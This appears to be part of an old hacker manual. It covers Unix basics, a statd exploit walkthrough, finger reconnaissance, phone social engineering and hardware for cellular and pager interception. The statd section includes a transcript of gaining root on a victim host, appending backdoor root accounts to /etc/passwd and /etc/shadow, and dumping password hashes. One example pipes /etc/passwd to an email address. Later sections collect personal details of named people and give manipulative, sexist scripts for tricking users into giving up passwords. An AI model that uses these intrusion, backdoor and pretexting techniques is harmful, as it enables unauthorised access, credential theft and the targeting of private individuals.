execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);

}

[16.0.5] Basic Unix Commands

pwd - Shows the current directory that you are in.

cd – change directory. Ex: cd hack would put you into the directory hack

cd .. would drop you back 1 directory. So if you are in /home/chameleon and you type cd .. you would then be in /home

ls – List files. ls –a to show ALL files. ls –l to list files in long format with byte size etc.. ls –la to do both.

chmod – This command changes permissions of a file or directory. The syntax is as follows:

chmod who+,-,=r,w,x

who can be u (user) g (group) o (other) a (all)

The + means to add the permission and - means to remove the permission.

cat – This prints out stuff to the screen. Such as files. Ex: cat /etc/passwd this would print the password file to the screen. You could also do cat /etc/passwd > password.txt this would redirect the out put of passwd into the file password.txt, that is what the > is used for.

passwd – Changes password to a users account.

ps – Shows what processes you have running. ps –e will show everything that you have running.

grep – Searches for words that you specify. This can be used to search a file for a certain word

Ex:

$ grep rhino9 elite.txt

Rhino9 is elite…

we could also use this to find a username with out a password in the passwd file. We would do cat /etc/passwd | grep ::

mv – Moves (rename) files and directorys. Syntax: mv filename newfilename You can also pass folder arguments such as mv /etc/passwd /etc/passwd.txt Example mv command.

$ ls

rhino9

$ mv rhino9 rhino9.txt

$ ls

rhino9.txt

cp – Copy. Syntax: cp filename copiedfilename You can also pass folder arguments

ex: cp /e/beer cp /e/beer.txt

man – Manual pages. Syntax man commandyouneedhelpon. Ex: man grep would give you help on the grep command

--help – Get help on certain commands. Ex: finger –help

mkdir – Creates a directory. Syntax: mkdir newdirname

rmdir – Removes a directory. Syntax: rmdir dirname

rm – Removes files and folder. Syntax: rm filename rm –R foldername (most systems)

write – Write to another users terminal. Syntax write user ttyname then hit enter then type stuff then ctrl+d

mesg – Turns on or off write access to your terminal. Syntax: mesg y (on) mesg n (off)

su – While you are already logged into a system. You can log in with another account. su username

w – Shows who is online.

who – shows who is online.

[16.0.6] Special Chracters in Unix:

* - matches any number of single characters eg. $ ls john* will list all files that begin with john

[...] - matchs any one of the chracter in the [ ]

? - matches any single chracter

& - runs a process in the backgroung leaving your terminal free

$ - values used for variables also $n - null argument

>- redirectes output ls -la > /tmp/list

< - redirects input to come from a file

>> - redirects command to be added (appended) to the end of a file

| - pipe output (eg: cat /etc/passwd | mail tk85@hotmail.com will mail tk85@hotmail.com the /etc/passwd file)

[16.0.7] File Permissions Etc..

-rwxrwxrwx 1 user group 5 Dec 22 12:52 filename

The first section is the file permissions, read & write etc..

If the first character is:

- - is an ordinary file

d - is a directory

b - is a block file

c - is a character file

The next 3 characters after the first char, are the owners rights to the file. They can be r or w or x or all 3 or whatever. The second 3 characters are the group rights to the file and they can be r or w or x or all 3 or whatever. The last 3 characters are everyone elses rights to the file and they can be r or w or x.
r – read

w - write

x – execute

The next section after –rwxrwxrwx is how many files are within that folder. If it is not a folder then it will be 1 and if it is a folder then it will be how many files are in it. The next section after that is the username section. It is the username of the owner of the file. So therefore whoever’s name is there has the owner rights as described earlier. Then after that is the groupname. It is the name of the group that the file is in. Whatever the groupname is the group rights apply to it. Then comes the file size then the file date and lastly the file name.

Passwd Entry Break Down

chameleon:k54doPeHte:0:0:root of all evil:/home/chameleon:/bin/bash

^^^^^^^^^ ^^^^^^^^^^ ^ ^ ^^^^^^^^^^^ ^^^^^^^^^^^^^^^ ^^^^^^^^

A B CD E F G

--------------------------------------------------------------------------------------------------------------------

A B C D E F G

[16.0.8] STATD EXPLOIT TECHNIQUE

Statd Is one of the best c file exploits in a long time. Statd single handedly exploits SunOS X.X & Sys V systems. It works by exploiting a buffer overflow through rpc and drops you into root on a remote system. There are statd scanners and other neat tools that can be found at,

www.d-lab.com.ar/sekret/warez

(home of the famous Code Zero). Once you have the statd exploit program (runs on some sunos & sys v servers) you will want to either use a scanner to scan a large list of servers for statd exploitable ones. One good way of finding statd exploitable server is going to yahoo and then searching for "sys v" then try the different servers that yahoo finds. You can use a program called "hosts" by Devix that will dump server names from html files. So if you goto yahoo and then search for sys v you could dump all the serves into a text file with the hosts program and then use a statd scanner to have it check for statd exploitable servers. Devix’s hosts program can be found on the rhino9 site. Ok so say you have found a statd able server. You type at your prompt statd server.com Here is a log of an actual hack using statd. Note: Comments have *’s around them.

InterCore:/home/chameleon/ $statd

www.victim.com

*This server is statd exploitable but the server admin has been notified so don’t try it.*

rpc.statd is located on tcp port 44417

sent exploit code, now waiting for shell...

*first thing to do is type, w, to see who is on and if any sysadmins are active*

# w

5:27am up 3 day(s), 6:35, 4 users, load average: 0.05, 0.06, 0.07

User tty login@ idle JCPU PCPU what

gabe pts/3 Sat 1am 2:38 1:37 -tcsh

gburgyan pts/4 Fri11pm 55 20 2 pine

gabe pts/5 Sat 7am 3:08 29 -tcsh

gburgyan pts/8 Mon 4am 23:22 16 -tcsh

*Note: statd is not telnet so you wont show up when someone does w etc.. so you are a ghost*

# cat /etc/passwd

root:x:0:1:System Administrators:/:/sbin/sh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

kane:x:539:107:Kane Products FTP account:/usr/www/docs/kane/:/bin/true

ecco:x:540:107:ECCO:/usr/www/clients/ecco/:/bin/true

iodatsys:x:541:107:I/O Data Systems:/usr/www/clients/iodatasys/:/bin/true

nealschu:x:542:107:Neal Schuman FTP Account:/usr/www/clients/nealschuman/:/bin/true

jjames:x:543:107:Joanne James:/home/jjames:/bin/tcsh

nlock:x:543:107:nlock:/home/milo:/bin/tcsh

xlock:x:0:1:xlock:/:/sbin/sh

# echo b0bby:x:542:107:Rhino9 owns bitch:/usr/rhino9/:/bin/tcsh >> /etc/passwd

# echo b0b:x:0:1:Rhino Root:/:/sbin/sh >> /etc/passwd

*What this does is copys a low level user b0bby and a root user b0b. Remember that 2 >>’s make the stuff appened to the passwd file. If it was one > then the whole thing would be over written and that is not good!*

# cat /etc/shadow

root:jLKY54WA3Teeo:10200::::::

daemon:NP:6445::::::

bin:NP:6445::::::

sys:NP:6445::::::

adm:NP:6445::::::

kane:*LK*:::::::

ecco:J/f78z945yJiQ:10199::::::

iodatsys:k/F455ygv0lKo:10199::::::

nealschu:Z1te54ytjJxtyY:10199::::::

jjames:q1dMg453A0LYLE:10199::::::

nlock:hEcxTL/4353p3FU:10216::::::

xlock::10200::::::

# echo b0bby::10199:::::: >> /etc/shadow

# echo b0b::10200:::::: >> /etc/shadow

*You must do the passwd and shadow echos as we have show here if the system uses shadowed passwords. What we have just done is add the logins to the shadow password*

*Now press control + ][ Then hit enter*

DropStatd> quit

*Type quit at the prompt. You are now back on your system. Now telnet back to

www.victim.com*

InterCore:/home/chameleon/ $ telnet

www.victim.com

Trying 205.133.121.210...

Connected to deals.4deals.com.

Escape character is '^]'.

UNIX(r) System V Release 4.0 (hq)

*Then it will ask you to set a password*

VictimCorp$ su b0b

*What we did the was su into b0b, our root account. Now set a pass for b0b*

# passwd b0b

*Enter your pass*

There you go that basically all it takes to get root onto a system that is statd exploitable.

Thank you to so1o for that mad phat exploit.

[16.0.9] System Probing

The following are ways in which to gather information from a target host.

For the rest of this topic we will refrer to the target site which will be ninja.com.

These are in no order and are mostly unix commands used to gather information about a system.

[16.1.0] Port scanning:

You can find many port scanners on the internet. Search yahoo for portscan etc…
What is a port scanner?

What a port scanner does is it checks a remote host for open ports, ports listening for a connection request or remote services etc… The importance of port scanning a system is to find out the services it has open. If we know what services a server has open we can then research and try to find flaws for those services. Also we can do certain DoS attacks if we know what ports are open. There are many port scanners. Some of the more advanced ones are for unix and can not leave a trace on the remote server that you port scanned.

[16.1.1] rusers and finger command:

The commands syntax are as follows:

rusers [-a] [-h] [-i] [-l] [-u] [host ...]

finger

-v, --version display version number

-i, -l, -m, --info display full user information

-b, -s, --brief opposite of --info; only display login records

-f, --faces display mugshot for user

-P, --port #p connect to finger daemon using port or service #p

-h, --help display this message

Now you will find however that most servers have turned off finger services. Almost no WindowsNT servers have finger services and most unix have shut off finger services. The rusers command is to check for people logged in with rsh or rlogin (remote login).

Side Note: There used to be an old bug in rlogin where you could type: rlogin –lroot victim.com and when the remote server parsed the data it would not read right and you would get root access however this technique is old and rarely works anymore. By using finger and rusers we can get users names and that right there can lead to access of a system. Take nether.net for example. If you finger nether.net

(finger @nether.net) you will get a list of user names. Now its been my experience that systems such as nether.net or places that give access to everyday users, 1 out of 70 or so users picks the same user name as there password. So it wouldn’t take much time to finger @nether.net then telnet to nether.net and try all the users you got from the finger. Also since you have gotten a list of usernames from finger nether.net you could then send e-mails to the users saying that you are a system official at nether.net and need to verify there password etc… You would be surprised what a little mind games can do for you. Also a good

finger –l @victim.com can give you information such as the last time a user logged in, what type of shell there account is set to use, and where there home directory is. We can also watch for patterns in a users access to a system. We could see whether they come on at night or during the day. To drop back to the thing of knowing about a person and there information to try and guess or talk them out of there password. Here is a finger on purdue. Look at the interesting information we can get.

InterCore:/home/chameleon/ $finger @purdue.edu

[purdue.edu]

To use finger to search the Purdue Electronic Directory Service, specify your

query as a person's given name. You can specify just a last name, a first

name and a last name, or a first name, last name, and middle initial, by

separating them with periods or commas. For example,

finger smyth@purdue.edu

finger smyth,veronica@purdue.edu

finger veronica.j.smyth@purdue.edu

Note: there was a lot more then this but I snipped it to make this shorter. Basically what it is saying is you got to put a

user@server.com

instead of just server.com or in this case, purdue.edu.

InterCore:/home/chameleon/ $

So by looking at what it said I see it says finger

smyth@purdue.edu

as an example. Now this is probably the same example that comes with this particular finger daemon but what the hell, lets try it.

InterCore:/home/chameleon/ $finger smyth@purdue.edu

[purdue.edu]

Output of your query: smyth

Name Dept/School Phone Status

-------------------------------------------------------------------------------

veronica j smyth computing center +1 777 99-99999 staff

michael steel smyth engineering and tec student

barbara j wilson smyth liberal arts and sc student

william paul smyth freshman engineerin student

erin margaret smyth science student

cheryl lynn smyth liberal arts student

-------------------------------------------------------------------------------

For a more detailed response, finger "query_smyth@directory.purdue.edu".

For help, finger "help@directory.purdue.edu".

InterCore:/home/chameleon/ $

Now this helps us in some ways and doesn’t. We can see through this finger full names of students and what there major is. So what you ask? You know how much information you can get from someone’s legal full name? Chameleon will teach you how much later on in this document. So yes this finger was good because it got us personal information about a few account holders at purdue.edu even an administrators number but, what are the user names to these accounts? Well most universities issues there students accounts in the same way. They usually make the username for a students account first letter of first name and then full last name. So if your name is Kevin Hall your user name would be

khall@purdue.edu

. Now we could then try and finger that user. So we would do the following:

InterCore:/home/chameleon/ $finger khall@purdue.edu

[purdue.edu]

Output of your query: khall

Name Dept/School Phone Status

-----------------------------------------------------------------------------------

Kevin G. Hall computing center +1 213 463-6694 student

khall@purdue.edu

-----------------------------------------------------------------------------------

For a more detailed response, finger "query_khall@directory.purdue.edu".

For help, finger "help@directory.purdue.edu".

InterCore:/home/chameleon/ $

We see that the finger dameon says for a more detailed response to do

finger

query_khall@direcroty.purdue.edu

So we type in the command

InterCore:/home/chameleon/ $finger query_khall@directory.purdue.edu

[scribe.cc.purdue.edu]

Output of your query: query_khall

----------------------------------------

name: Kevin G. Hall

campus: west lafayette

title: sen syst anlyst/sen pace tech cons

department: computing center

building: potr

office_phone: +1 765 49-68285

email: khall@purdue.edu

----------------------------------------

For help, finger "help@directory.purdue.edu".

InterCore:/home/chameleon/ $

Now this is interesting. We have a user name, khall, we have the users full name, Kevin G. Hall and we know his title and department. So from this information you will learn later you can get his home phone number and address. If we were to give the student a call at their house or dorm etc… It wouldn’t be too hard for anyone with a little bit of social engineering skills to talk this user out of his password.

There is a basic example of how to get information about a logged on user.

[16.1.2] Mental Hacking, once you know a username.

Note: This is mostly going to work for systems that provide users with accounts and not company servers.

If you (the (cracker/hacker) are a Male then you would want to try to finger and get a username of a woman. You could then do 2 things. You will probably get there full name but if not read my (chameleons) later paper about getting people’s information. For simplicities sake say you already have the users phone number which might sound hard to do but isn’t. So say you have their phone number and it’s a woman. Call the lady up. A true social engineer will know right away what kind of woman it is. On you can push over and mow down or one that has a strong head on her shoulders. If she answers and sounds lame then go for the approach of a stern voice saying its imperative etc… that you verify her user name and password. If the lady seems to have a strong head on her shoulders then you would want to talk nicer and flirt a bit. If you are a woman (cracker/hacker) then you will want to find a males account. Women let me tell you this. The best hackers and crackers out there are women. If you are a woman then you will want to try to get into a male’s account. Once you have a male account holders phone number call him up. Women you got it easier see you don’t need to know what type of guy it is. All guys are horny. So talk with your sexy voice. Flirt with them etc… It is easier for women to talk people out of passwords. If you are a guy (cracker/hacker) and are trying to get a guys password then have a girlfriend of yours try to do it. Remember this most of all, KNOW the person you are calling. You could call them up and tell them you are from the local high school and are doing a survey and then ask them a bunch of questions to get to know what they like and then when you later call to get there password you use this information to get on there better side and win there trust. This is called mental hacking and it is not that hard at all. One thing that the hackers of today have lost is there social skills. Some systems don’t have software exploits. Sometimes you have to go the extra mile. Note: Don’t get me wrong and think I am some weirdo about the way I talked about men and women but, I do know people well.

[17.0.0] Making a DDI from a Motorola Brick phone

By Virtual of Cybrids CSE

www.cybrids.org

OK, here it is, i'm not gonna talk about it a whole lot, just tell you

what i've done, and what i want to see done. As of this point I have

found the Clock, Data, and the spot where you would feed your audio input

from your scanner that has WBFM.

First you will need to locate the chip that has the clock and data pins.

This will be labeled SC3800xxFN, or something close to that, xx being some

numbers. Having trouble already, then i'll tell ya another way, its the

biggest PLCC (square) chip in the phone. Now look at the chip, there is a

notch on the front of it which means pin 1. Now look at the opposite side

of that dot, to the pins on the bottom, count over from the left, pins 8

and 9 from the left side are the ones you want. I have included a picture

of the inside of a brick phone. The red arrow points to the side of the

chip that I am talking about. Pin 8 is the data and Pin 9 is the clock.

Those are the pins that will be fed to your computer for decoding.

The receiver chip is what you need to modify next. It's on the circuit board

with the big white rectangle thing, and the big peices of metal, its the

only square chip you can see. Its got a few numbers on it and i'll put em

here to help you find it, 185, X94R01, something to that effect, but just

look for the only PLCC chip visible. I have marked this chip with a blue

circle. With the phone oriented like in the picture, cut the trace coming

from the bottom pin on the right of the chip. Connect your scanner's OUTPUT

to the other side of that trace (not the one conecting to the chip).

Cut it in the center so you will have room to solder to either side

of the wire trace. The pin coming off the chip is what the cellular phone

is receiving, the other side of the wire trace that you cut is where its

being sent.

That about sums up what you need to know, if you have any other non-bonehead

questions, i'm in #cellular on EFnet most all the time and #Cybrids on

Undernet.

Now here is what I want to see happen, for all the smart guys out there.

Scanners are cool, but why use it, the phone is capable of receiving the

RECC without a scanner, I am working on makin this happen right now, but

with others help, i'm sure this could get done a lot faster, and would

benefit everyone greatly.

Cable connections to the computer

DDI Parallel Port

Clock 10

Data 15

Ground 18

Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undernet.

(Beware of new technology coming out from companies such as Cellular One, technologies such as FPF Protection which requires you to enter an access code to make out going calls on your cellphones.)

[18.0.0] Pager Programmer

By Virtual of Cybrids CSE

In order to build a pager programmer, you are going to need a few things. A soldering Iron, the pager you are going to program, and a few brain cells. You will also need the software that is used to program your specific pager which can be found on my web page at the bottom of the text. The diagram I have included should be self explanatory but I will say a few things about it just incase. The only chip needed is the Max233 which will convert the serial port voltage down to TTL level so the pager can understand it. Normally a serial port communicates with +15 volts being a logic high and -15 being a logic low. The chip converts this down to TTL which is 0 - 5 volts where 0 is low and 5 is high. The chip is shown inside the plastic hood that covers the connector. Make sure your hood is plastic and not metalized as this is real metal coating and will short the pins. This side will plug into your serial port. The 4 pin connector shown will go to the pager. Where it says +5 volts is where you supply the chip with 5 volts, its not a 5 volt output. A circuit like this could be used to generate the +5 volts using the very common 7805 voltage regulator. _________

| |

| 7805 |

|_______|

| | |

Vin ________| | |_________Vout

-----

--- gnd

Vin = Voltage in, 6-12 volt wall adaptor, + goes to Vin, - goes to gnd

Vout = +5 volts out

gnd = ground, could be thought of as minus

You will also have to supply your pager with power, which is probably 1.5 volts. Then you will have to find the transmit and receive pins on your pager and hook it up to the programmer accordingly. The only way to do this is to open up your pager and look around for something that might look like a programming connector or pad with 3 or 4 wires, don't confuse this with the connector that connects the processor and receiver boards in Motorola Bravo pagers. I can't give exact instructions here because unfortunately I do not own every pager in the world. If they aren't hooked up correctly when you run the pager programming software it will just give you an error but won't affect the pager, so just switch the wires around. Make sure you hooked the ground to the pager too, or else nothing will work. The gnd wire should be connected to the minus terminal on the pagers battery connector.

The chip, hood, and connector can be bought at DigiKey. This is by far the simplest and easiest to build design I've seen on the net. Motorola's web page shows all of their pager designs so you can figure out what type of pager you have, and can then get the software for it.

Programming Software:

http://www.cybrids.org/virtual/

Motorola:

http://www.mot.com/MIMS/MSPG/cgi-bin/prodcat.cgi

Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undernet.

[19.0.0] The End

]

Cross-Indexed:

The MH DeskReference - II

Some pages may require Adobe Acrobat Reader^™